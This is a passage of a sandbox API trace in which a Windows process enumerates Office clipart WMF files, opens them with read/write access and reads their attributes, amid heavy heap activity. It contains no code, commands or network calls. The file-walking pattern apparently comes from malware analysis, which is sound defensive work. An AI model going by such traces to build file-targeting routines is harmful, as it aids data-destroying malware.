Size=0x8a) returned 0x8a400 [0102.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 69 [0102.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.069] GetFileType (hFile=0x33c) returned 0x1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.070] CloseHandle (hObject=0x33c) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.071] AreFileApisANSI () returned 1 [0102.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 69 [0102.071] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfe2)) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0102.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.071] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD08758_.WMF", cAlternateFileName="")) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0102.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.072] AreFileApisANSI () returned 1 [0102.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0102.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.073] AreFileApisANSI () returned 1 [0102.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 69 [0102.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.073] GetFileType (hFile=0x33c) returned 0x1 [0102.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.074] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.074] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.074] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.074] CloseHandle (hObject=0x33c) returned 1 [0102.074] AreFileApisANSI () returned 1 [0102.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0102.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 69 [0102.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.074] GetFileType (hFile=0x33c) returned 0x1 [0102.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0102.075] CloseHandle (hObject=0x33c) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.076] AreFileApisANSI () returned 1 [0102.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 69 [0102.076] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f00)) returned 1 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0102.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.076] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60ca, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD08773_.WMF", cAlternateFileName="")) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0102.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.077] AreFileApisANSI () returned 1 [0102.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0102.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 